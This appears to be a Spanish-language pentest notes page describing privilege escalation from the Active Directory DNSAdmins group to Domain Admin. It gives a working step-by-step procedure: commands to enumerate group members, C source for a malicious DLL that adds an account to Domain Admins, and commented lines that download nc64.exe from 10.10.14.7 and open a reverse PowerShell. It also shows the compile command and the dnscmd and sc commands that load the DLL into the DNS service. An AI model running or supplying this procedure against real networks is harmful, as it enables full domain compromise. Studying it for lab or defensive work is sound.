DNS Admins

DNS admin to Domain admin:

El ataque se basa en una inyección de DLL en el servicio dns que se ejecuta como SISTEMA en el servidor DNS, que la mayor parte del tiempo se encuentra en un controlador de dominio.

1. Identificando Grupo DNS admin:

# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"
# RSAT
Get-ADGroupMember -Identity DNSAdmins

2. Crear DLL maliciosa:

Creando la dll maliciosa Manualmente:

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    if (dwReason == DLL_PROCESS_ATTACH){
        system("net group \"domain admins\" bcontabilidad /add /domain");
        //system("icacls C:\\share\\Bginfo64.exe /grant Everyone:F /T");
        //system("curl.exe 10.10.14.7:8000/nc64.exe -o C:\\share\\Bginfo64.exe");
        //system("C:\\share\\Bginfo64.exe 10.10.14.7 8888 -e powershell.exe");
        //system("whoami > C:\\Windows\\Temp\\whoami.txt");
        ExitProcess(0);
    }
    return TRUE;
}

Compilar:

x86_64-w64-mingw32-gcc funcionara.c -shared -o kav1.dll

3. Configurar el uso de nuestra DLL

Habilitar el uso de la dll de manera remota:

Desde los privilegios del miembro de DNSAdminsgroup, configure DLL usando dnscmd.exe:

dnscmd resolute /config /serverlevelplugindll \\10.10.14.2\Prueba\kav1.dll

otra forma de hacerlo usando RSAT:

$dnsettings= Get-DnsServerSetting -ComputerName dcorp-dc -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll"
Set-DnsServerSetting -InputObject $dnsettings -ComputerName dcorp-dc -Verbose

Reinicie el servicio DNS (suponiendo que el grupo DNSAdmins tenga permiso para hacerlo):

sc.exe stop dns
sc.exe start dns
# o de forma remota
sc \\dcorp-dc stop dns
sc \\dcorp-dc start dns

De forma predeterminada, mimilib.dll registra todas las consultas de DNS en C:\Windows\System32\kiwidns.log

Mas informacion del ataque y la deteccion de este:

Abusing DNSAdmins privilege for escalation in Active Directorywww.labofapenetrationtester.com

From DnsAdmins to SYSTEM to Domain Compromise | Red Team Noteswww.ired.team

PreviousAccount Operator NextBackup Operator

Last updated 2 years ago

hashtagDNS admin to Domain admin:

hashtag1. Identificando Grupo DNS admin:

hashtag2. Crear DLL maliciosa:

hashtag3. Configurar el uso de nuestra DLL

hashtagReinicie el servicio DNS (suponiendo que el grupo DNSAdmins tenga permiso para hacerlo):

DNS admin to Domain admin:

1. Identificando Grupo DNS admin:

2. Crear DLL maliciosa:

3. Configurar el uso de nuestra DLL

Reinicie el servicio DNS (suponiendo que el grupo DNSAdmins tenga permiso para hacerlo):